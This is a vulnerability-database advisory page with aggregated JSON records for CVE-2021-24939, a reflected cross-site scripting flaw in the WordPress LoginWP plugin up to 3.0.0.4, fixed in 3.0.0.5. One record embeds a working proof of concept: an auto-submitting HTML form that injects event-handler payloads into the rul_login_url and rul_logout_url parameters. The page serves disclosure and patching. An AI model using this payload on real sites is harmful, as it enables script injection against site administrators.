WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability

2021-11-08T00:00:00

Description

Reflected Cross-Site Scripting (XSS) vulnerability discovered by JrXnm in WordPress LoginWP plugin (versions <= 3.0.0.4). ## Solution Update the WordPress LoginWP plugin to the latest available version (at least 3.0.0.5).

Affected Software

CPE Name	Name	Version
	peter's login redirect	3.0.0.4

{"id": "PATCHSTACK:F492B24FE05DEE1497854B03B608F368", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability", "description": "Reflected Cross-Site Scripting (XSS) vulnerability discovered by JrXnm in WordPress LoginWP plugin (versions <= 3.0.0.4).\n\n## Solution\n\n\r\n Update the WordPress LoginWP plugin to the latest available version (at least 3.0.0.5).\r\n ", "published": "2021-11-08T00:00:00", "modified": "2021-11-08T00:00:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE", "baseScore": 4.3}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "href": "https://patchstack.com/database/vulnerability/peters-login-redirect/wordpress-loginwp-plugin-3-0-0-4-reflected-cross-site-scripting-xss-vulnerability", "reporter": "JrXnm", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24939", "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "https://wordpress.org/plugins/peters-login-redirect/#developers"], "cvelist": ["CVE-2021-24939"], "immutableFields": [], "lastseen": "2022-06-01T19:28:50", "viewCount": 6, "enchantments": {"score": {"value": 2.0, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24939"]}, {"type": "wpexploit", "idList": ["WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748"]}]}, "affected_software": {"major_version": [{"name": "peter's login redirect", "version": 3}]}, "epss": [{"cve": "CVE-2021-24939", "epss": "0.000820000", "percentile": "0.333650000", "modified": "2023-03-19"}], "vulnersScore": 2.0}, "_state": {"score": 1698845847, "dependencies": 1660004461, "affected_software_major_version": 1666695388, "epss": 1679290575}, "_internal": {"score_hash": "b2248d299d7f1ca7da1887f88ef7af13"}, "affectedSoftware": [{"version": "3.0.0.4", "operator": "le", "name": "peter's login redirect"}], "vendor_cvss": {"score": "3.1", "severity": "Medium severity"}, "owasp": "A7: Cross-Site Scripting (XSS)", "classification": "Cross Site Scripting (XSS)"}

{"cve": [{"lastseen": "2023-11-27T14:38:59", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "cve", "title": "CVE-2021-24939", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "cpe": [], "id": "CVE-2021-24939", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "prion": [{"lastseen": "2023-11-22T00:40:57", "description": "The LoginWP (Formerly Peter's Login Redirect) WordPress plugin before 3.0.0.5 does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-06T16:15:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-06T21:27:00", "id": "PRION:CVE-2021-24939", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2021-24939", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cnvd": [{"lastseen": "2022-11-05T07:59:22", "description": "WordPress is the WordPress Foundation's suite of blogging platforms developed using the PHP language. The platform supports the hosting of personal blogging sites on servers with PHP and MySQL. WordPress LoginWP plugin has a cross-site scripting vulnerability in versions prior to 3.0.0.5, which stems from a lack of data validation filtering of user-supplied data and output. An attacker could exploit the vulnerability to execute JavaScript code on the client side.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2021-12-09T00:00:00", "type": "cnvd", "title": "WordPress LoginWP plugin cross-site scripting vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-12-10T00:00:00", "id": "CNVD-2021-95951", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-95951", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpexploit": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpexploit", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPEX-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "", "sourceData": "<html>\r\n <body>\r\n <form action=\"https://example.com/wp-admin/admin.php?page=loginwp-redirections&new=1\" id=\"hack\" method=\"POST\">\r\n <input type=\"hidden\" name=\"rul_login_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-login_url/)//' />\r\n <input type=\"hidden\" name=\"rul_logout_url\" value='\" style=animation-name:rotation onanimationstart=alert(/XSS-logout_url/)//' />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n <script>\r\n var form1 = document.getElementById('hack');\r\n form1.submit();\r\n</script>\r\n</html>", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "wpvulndb": [{"lastseen": "2022-01-17T19:25:27", "description": "The plugin does not sanitise and escape the rul_login_url and rul_logout_url parameter before outputting them back in attributes in an admin page, leading to a Reflected Cross-Site Scripting issue\n\n### PoC\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2021-11-08T00:00:00", "type": "wpvulndb", "title": "LoginWP < 3.0.0.5 - Reflected Cross-Site Scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24939"], "modified": "2021-11-08T07:42:09", "id": "WPVDB-ID:1A46CFEC-24AD-4619-8579-F09BBD8EE748", "href": "https://wpscan.com/vulnerability/1a46cfec-24ad-4619-8579-f09bbd8ee748", "sourceData": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}

WordPress LoginWP plugin &lt;= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability

Description

Affected Software

Related

WordPress LoginWP plugin <= 3.0.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability